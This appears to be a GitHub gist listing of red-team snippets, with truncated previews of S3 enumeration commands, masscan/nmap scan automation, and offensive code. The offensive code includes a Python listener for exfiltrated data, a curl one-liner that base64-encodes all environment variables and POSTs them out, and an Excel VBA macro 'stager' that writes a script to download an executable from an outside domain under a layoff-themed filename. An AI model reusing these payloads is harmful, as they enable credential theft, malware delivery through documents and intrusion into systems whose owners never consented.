iknowjason
/ listbuckets.sh
Last active
April 19, 2020 12:40
List S3 buckets or objects in a specific bucket
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| s3mcd ls | |
| s3cmd ls s3://<BUCKET> |
iknowjason
/ listobjects.sh
Last active
April 19, 2020 17:48
List objects in a bucket with just object names
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| s3cmd ls -r s3://<BUCKET>/<OBJECT>/ | awk ‘{print $4}’ | |
| aws s3 ls s3://<BUCKET> --recursive |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| s3cmd get s3://<BUCKET>/<OBJECT> <LOCAL_FILE> |
iknowjason
/ getbucketencryption.sh
Last active
April 19, 2020 19:02
Get the server-side encryption configuration for an S3 bucket, or test for encryption with head-object command
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aws s3api get-bucket-encryption --bucket <BUCKET> | |
| aws s3api head-object --bucket <BUCKET> --key <KEY> |
iknowjason
/ post.py
Last active
July 5, 2023 02:35
Data exfiltration using curl and python SimpleHTTPServer class
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from http.server import HTTPServer, BaseHTTPRequestHandler | |
| class SimpleHTTPRequestHandler(BaseHTTPRequestHandler): | |
| def do_GET(self): | |
| self.send_response(200) | |
| self.end_headers() | |
| self.wfile.write(b'Hello, world!') | |
| def do_POST(self): | |
| content_length = int(self.headers['Content-Length']) |
iknowjason
/ curl-exfil.sh
Last active
August 20, 2020 13:56
Curl client exfil of environment variable that is Base64 encoded
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| STUFF=`env | base64`; curl -d "$STUFF" -X POST http://localhost:8000 |
iknowjason
/ payload1.vbs
Created
July 31, 2020 21:12
VBS code to write a stager inside of Excel Macro
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Sub CommandButton1_Click() | |
| Dim myoutputfile As Integer | |
| Dim FilePath As String | |
| Set oShell = CreateObject("WScript.Shell") | |
| userProfilePath = oShell.ExpandEnvironmentStrings("%UserProfile%") | |
| myFile = userProfilePath + "\layoffs15.vbs" | |
| myoutputfile = FreeFile | |
| Open myFile For Output As #myoutputfile | |
| Print #myoutputfile, "HTTPDownload ""http://billing.rtcfingroup.com/nysoft15.exe"", """ & userProfilePath & """"; "" |
iknowjason
/ masscan_nmap1.py
Last active
September 17, 2020 11:37
A more automated way to quickly run masscan to discover live hosts and ports and have nmap run scan against that output
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Overview: These steps will help you automate masscan and nmap together. Run masscan to enumerate all live hosts and listening ports. | |
| ### Then use nmap to run a more targeted service and NSE basic scripts scan. This will ran against all hosts with all enumerated ports. | |
| ### So there might be extra port scans that run against hosts that don't have those listening ports. | |
| ### Important Note: Tested on masscan 1.06 - There might be issues with older versions of masscan (i.e., 1.04) with JSON output | |
| ### Step 1: Run masscan with a JSON output file | |
| ### Example: sudo masscan 192.168.10.0/24 -p1-65535 -oJ mscan.xml | |
| ### Note: Make sure you take note of your output file for next step | |
| ## Step 2: Run this script that takes the output from Masscan JSON output file and outputs a command you can use for nmap |
iknowjason
/ masscan_nmap2.py
Last active
December 15, 2023 17:44
Automates masscan and nmap by creating a list of hosts and normalized ports and running both masscan and nmap automatically
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Edit the file for any nmap specific options after masscan runs | |
| 2. Run it: masscan_nmap2.py -i <IP> -p <Ports> -r <RATE> |
iknowjason
/ masscan_nmap3.py
Last active
July 11, 2023 09:57
A python script that automates running masscan and nmap together. Just supply the first masscan command for hosts and ports
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Step 1: Run masscan with a JSON output file | |
| ### Example: sudo masscan 192.168.10.0/24 --rate 10000 -p1-65535 -oJ mscan.xml | |
| ### Note: Make sure you take note of your output file for next step | |
| ### Important Note: Tested on masscan 1.06 - There might be issues with older versions of masscan (i.e., 1.04) with JSON output | |
| ## Step 2: Run this script that takes the output from Masscan JSON file and outputs a command you can use for nmap | |
| ### Example: python3 masscan_nmap3.py mscan.xml | |
| ### Note: The script will create 'scans.txt' to be used by nmap; This file will allow you to run one nmap command per line, with each host and the ports listening that were enumerated by masscan | |
| ## Step 3: Run the command below which will loop through 'scans.txt' and run an nmap scan. An output file will be created for each host: |
OlderNewer